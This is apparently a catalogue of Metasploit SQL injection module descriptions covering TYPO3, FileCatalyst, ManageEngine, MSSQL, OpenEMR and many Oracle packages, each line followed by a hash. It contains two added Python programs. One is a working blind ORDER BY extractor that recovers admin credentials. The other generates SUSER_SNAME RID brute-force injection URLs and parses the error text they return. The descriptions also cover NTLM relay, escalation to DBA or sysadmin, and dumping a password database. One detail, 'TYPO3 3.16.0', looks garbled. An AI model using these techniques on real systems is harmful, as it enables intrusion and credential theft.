This Metasploit module exploits a SQL injection vulnerability in TYPO3's NewsController.php in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection can be used to obtain password hashes for application user accounts. This Metasploit module has been tested on TYPO3 3.16.0 running news extension 5.0.0. The module tries to extract the username and password hash of the administrator user. It injects SQL that alters the ordering of the returned news items and, for each position of the target string, tests every character of a pattern to see whether it belongs to the username or password being extracted. If the character does not match, the results come back inverted (News #2 appears before News #1, so Pattern2 before Pattern1); if it does match, the results come back in their proper order (News #1 appears before News #2, so Pattern1 before Pattern2).
472f7767d1d622fc181d7fa0a90d223e85f29ef884a67376c132a17b0cf4808e
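The order-based blind extraction described for the TYPO3 news entry above, as an added example that is not the Metasploit module's own code. It stands in a sqlite database for the vulnerable site (table and column names, the two news titles and the sample credential are all constructed), concatenates attacker text into ORDER BY the way the bug class does, and recovers the target columns by watching only whether the two rows come back in proper or inverted order:

```python
import sqlite3
import string

# Constructed stand-in for the vulnerable site: two news rows whose relative
# order is observable, plus a backend user table holding the target credentials.
# The username and hash below are made-up sample data.
SEED_SQL = """
CREATE TABLE tx_news (uid INTEGER PRIMARY KEY, title TEXT);
INSERT INTO tx_news VALUES (1, 'Pattern1'), (2, 'Pattern2');
CREATE TABLE be_users (uid INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO be_users VALUES (1, 'admin', '$P$Cx9zQ1example');
"""

# Characters tried at each position. The single quote is deliberately absent
# because it is used as the literal delimiter in the probe.
ALPHABET = string.ascii_letters + string.digits + "$./_-"

PROPER_ORDER = ["Pattern1", "Pattern2"]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SEED_SQL)
    return conn


def vulnerable_listing(conn, order_by):
    """Simulates the injectable ORDER BY: the attacker-controlled text is
    concatenated into the query verbatim, exactly the bug class at hand."""
    rows = conn.execute(f"SELECT title FROM tx_news ORDER BY {order_by}").fetchall()
    return [r[0] for r in rows]


def probe(column, position, ch):
    """ORDER BY expression that sorts ascending when the character at `position`
    of be_users.<column> equals `ch`, and descending otherwise.
    Note: sqlite compares strings case-sensitively; on MySQL you would wrap the
    comparison in BINARY() to keep upper and lower case distinct."""
    return (
        f"uid * (CASE WHEN (SELECT substr({column}, {position}, 1) "
        f"FROM be_users WHERE uid = 1) = '{ch}' THEN 1 ELSE -1 END)"
    )


def extract(conn, column, max_len=64):
    """Recover be_users.<column> one character at a time from the row order only."""
    if column not in ("username", "password"):
        raise ValueError("unexpected column")
    recovered = ""
    for position in range(1, max_len + 1):
        for ch in ALPHABET:
            if vulnerable_listing(conn, probe(column, position, ch)) == PROPER_ORDER:
                recovered += ch
                break
        else:
            # No candidate matched: substr() returned '' past the end of the string.
            break
    return recovered


def demo():
    conn = make_db()
    return extract(conn, "username"), extract(conn, "password")


if __name__ == "__main__":
    user, pw_hash = demo()
    print(f"username={user} password_hash={pw_hash}")
```

Each probe costs one request, so the cost is roughly alphabet size times string length; against a real target the same loop would issue HTTP requests with the probe in the overwriteDemand parameter and compare the positions of two known titles in the response.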
This Metasploit module exploits a SQL injection vulnerability in Fortra FileCatalyst Workflow less than or equal to v5.1.6 Build 135, by adding a new administrative user to the web interface of the application.
1156e7ce3120c4d6f108a0801b0bdca55b989aecbf8c92115bba574b28955c49
This Metasploit module exploits a SQL injection vulnerability in the WP Symposium plugin before 15.8 for WordPress, which allows remote attackers to extract credentials via the size parameter to get_album_item.php.
2961b2a6386f280ff2a5c8a22286ae6b39869c94cfc164ff4f01d0e67ea4a838
ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate privileges and obtain Super Administrator access. A Super Administrator can then use these privileges to dump the whole password database in CSV format. PMP can use either a MySQL or a PostgreSQL database, but this module only exploits the latter, since stacked queries are not available through the MySQL Java driver. PostgreSQL is the default database in v6.8 and above, but older PMP installations can be upgraded and keep using MySQL, so a higher version does not guarantee exploitability. This Metasploit module has been tested on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in v7.1 build 7105 and above.
3bb1458e9aceabbc6baaf58c805fc36d04c4e787a9a2a98f33a3d697bff053f3
This Metasploit module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module uses the SQL injection from GET_PATH to connect to the target SQL Server instance and execute a native stored procedure such as "xp_dirtree". The stored procedure then forces the service account to authenticate to the system defined in the SMBProxy option. For the attack to succeed, the SMB capture or relay module must be running on the system defined as SMBProxy. The database account used to connect to the database should only require the "PUBLIC" role. Successful execution of this attack usually results in local administrative access to the Windows system. In particular, this works well for relaying credentials between two SQL Servers that share a service account in order to get shells. If the relay fails, the captured LM challenge/response can instead be cracked offline with the HalfLM rainbow tables and John the Ripper.
07d8028c67f4c74422fce026d3e4f7c8c01787a332652cb8847f7c5bc5571deb
This Metasploit module can be used to brute-force RIDs associated with the domain of the SQL Server using the SUSER_SNAME function (which resolves a binary SID to an account name) via error-based SQL injection. This is similar to the smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC role (everyone). Information that can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated accounts can then be used in online dictionary attacks. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--.
0e0cd7442b34141ce286901bcc638f36f8b80933c0544ac4a91ea1079c35aa1f
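The building blocks of the RID brute force described in the SUSER_SNAME entry above, as an added example that is not the Metasploit module's own code. It encodes SIDs into the binary form SUSER_SNAME accepts, swaps the RID of a known domain account's SID for each candidate, wraps the call in a CONVERT(int, ...) so the resolved name leaks through SQL Server's conversion error, and parses that error. The sample SID, the error message text and the /testing.asp path are constructed placeholders; the error wording follows SQL Server's message 245:

```python
import re
import struct
from urllib.parse import quote

# SQL Server error 245 has this shape; the account name below is a constructed sample.
SAMPLE_ERROR = ("Conversion failed when converting the nvarchar value "
                "'CORP\\Domain Admins' to data type int.")
_NAME_RE = re.compile(r"converting the nvarchar value '(.*)' to data type int")


def sid_to_bytes(sid):
    """Encode 'S-1-5-21-a-b-c-rid' into the binary layout SUSER_SID returns:
    revision (1 byte), sub-authority count (1 byte), 48-bit identifier authority
    (big-endian), then each sub-authority as a 32-bit little-endian integer."""
    parts = sid.split("-")
    if parts[0] != "S":
        raise ValueError("not a SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    blob = bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
    return blob + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(blob):
    """Inverse of sid_to_bytes, used to sanity-check what the server hands back."""
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack("<%dI" % count, blob[8:8 + 4 * count])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def with_rid(domain_account_sid, rid):
    """Replace the last sub-authority (the RID) of a known domain account's SID.
    The count byte is unchanged because the RID slot already exists."""
    return domain_account_sid[:-4] + struct.pack("<I", rid)


def sname_probe(sid_blob):
    """Error-based probe: CONVERT(int, ...) fails on a non-numeric name and the
    error text carries the resolved account name back to the attacker."""
    return "(SELECT CONVERT(int, SUSER_SNAME(0x%s)))" % sid_blob.hex().upper()


def injection_url(path, sqli):
    """Fit a probe into the /testing.asp?id=1+and+1=[SQLi];-- syntax; the path
    and parameter name are placeholders for the real injection point."""
    return "%s?id=1+and+1=%s;--" % (path, quote(sqli, safe=""))


def parse_sname_error(message):
    """Pull the account name out of the conversion error, or None if the
    response carries no such error (RID unassigned or name suppressed)."""
    m = _NAME_RE.search(message)
    return m.group(1) if m else None


def rid_probes(domain_account_sid, start=500, count=5):
    """Generate (rid, url) pairs for a RID range: the core of the brute-force loop."""
    return [(rid, injection_url("/testing.asp", sname_probe(with_rid(domain_account_sid, rid))))
            for rid in range(start, start + count)]


if __name__ == "__main__":
    known = sid_to_bytes("S-1-5-21-1-2-3-1106")  # constructed sample domain account SID
    for rid, url in rid_probes(known, 500, 3):
        print(rid, url)
    print(parse_sname_error(SAMPLE_ERROR))
```

In practice the starting SID comes from the server itself (SUSER_SID of a known domain principal, leaked through the same error channel), and well-known RIDs such as 500 (Administrator) and 512 (Domain Admins) are worth probing first; responses without a conversion error mean the RID is not assigned or the application hides database errors, in which case a blind variant is needed.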
This Metasploit module can be used to escalate SQL Server user privileges to sysadmin through a web SQL injection. In order to escalate, the database user must have the db_owner role in a trustworthy database owned by a sysadmin user. Once the database user has the sysadmin role, the mssql_payload_sqli module can be used to obtain a shell on the system. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--.
2281ffe74b82b6590851bcfd613e9b6b34e0e85e927c0a4615fce7723f578db3
This Metasploit module can be used to escalate privileges via error-based SQL injection if the IMPERSONATE permission has been granted to the user. In most cases this results in additional data access, but in some cases it can be used to gain sysadmin privileges. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--.
d50e06d93b9cce5b4eedb05759e46b1ef7a302db4d0689fb0404c274fc0ff5d2
This Metasploit module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious requests to the ChartThemeConfig web service. This Metasploit module can be used to extract the site and project usernames and hashes.
08cbf9636cf1774ffb0ae21e481e4e9ea1bc079a6c23430561e43b5bfd796d44
This Metasploit module exploits a SQL injection vulnerability found in OpenEMR versions 5.0.1 Patch 6 and lower. The vulnerability allows the contents of the entire database (with exception of log and task tables) to be extracted. This Metasploit module saves each table as a .csv file in your loot directory and has been tested with OpenEMR 5.0.1.
066eeb43c6b2d8cd952b1105cfaa25528d4595e183b0c2660a66717e9f8a976c
This Metasploit module will escalate an Oracle DB user to MDSYS by exploiting a SQL injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. It then escalates the user to DBA by abusing the "CREATE ANY TRIGGER" privilege granted to the MDSYS user to create a malicious trigger in the SYSTEM schema (a two-stage attack).
91a0457e6fc1353dda1d938850804c7fbf4f3873992700b019c47715d498af97
The module exploits a SQL injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with the October 2008 CPU.
531bca332b7b8919c806ed365e8ad1c5e5000249344fccaf602038718feac7e5
This Metasploit module will escalate an Oracle DB user to DBA by exploiting a SQL injection bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.
47ba8aeb06908edd303259a2080cba7efcaa98f8f66c52b0fa64a15448287fe5
This Metasploit module will escalate an Oracle DB user to DBA by exploiting a SQL injection bug in the SYS.DBMS_METADATA.OPEN package/function.
f6664ac501c9f358d8d4a9410aab3c277a77640982c29a4ac936ead1bc75e8b3
The module exploits a SQL injection flaw in the DROP_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege.
7e5369ebdc4bfc61aa262475859d683b00bf47b5e34f9da7b3872e8242c9834c
This Metasploit module exploits a SQL injection flaw in the REMOVEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
27f5ae57e22ed3cfd2e38c06ca48a65e3dfb8c76f9cc56d51d4721d34c60da9c
This Metasploit module will escalate an Oracle DB user to DBA by exploiting a SQL injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This Metasploit module has been tested against 9i, 10gR1 and 10gR2.
45e22b08a22f5b9b513570650ac77c9b7cf896df1dddb9d97cc0659722506344
This Metasploit module will escalate an Oracle DB user to DBA by exploiting a SQL injection bug in the SYS.DBMS_METADATA.GET_XML package/function.
345c6446dfe846a011460df72073d8ff0549b8076c977837fb20c1f2ddb07dd3
This Metasploit module exploits a SQL injection flaw in the COMPRESSWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
8d3bbc62256bcef0370fd324d79badfe6dada95158c7b728fcf20137808677d2
This Metasploit module will escalate an Oracle DB user to DBA by exploiting a SQL injection bug in the SYS.LT.FINDRICSET package via the Evil Cursor technique. Tested on Oracle 10.1.0.3.0; it should work through 10.1.0.5.0 and reportedly on 11g. Fixed with the Oracle Critical Patch Update of October 2007.
c969f6f19cf659e35b78bffa83fbc8e8694a50647075c02b8636a5ef97eb6c17
This Metasploit module exploits a SQL injection flaw in the ROLLBACKWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
ccfe06863fa08c66b4bb04f888a3c40c6a7660aa2a9948479455b087d102bc4d
This Metasploit module exploits a SQL injection flaw in the MERGEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
25265a201b6de9b641b309ca9d9e2f86d75f62ec4113d2e80983a1052506dbe8
This Metasploit module will escalate an Oracle DB user to DBA by exploiting a SQL injection bug in the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package/function. This vulnerability affects Oracle Database Server 9i up to 9.2.0.5 and 10g up to 10.1.0.4.
dc9b1de7a0efe0b6df96fb180a6432e4861fefcaaceb66899e1acdd5821ec707
The module exploits a SQL injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with the October 2008 CPU.
14b30e15660808395b533ff80a789b56b79cedf1bffaa219897f461a53b655dc
The module exploits a SQL injection flaw in the CREATE_CHANGE_SET procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege.
26ed86f78f01db48be7f14a8b9f1b9fec76717709540eee30aa0dfa68088569f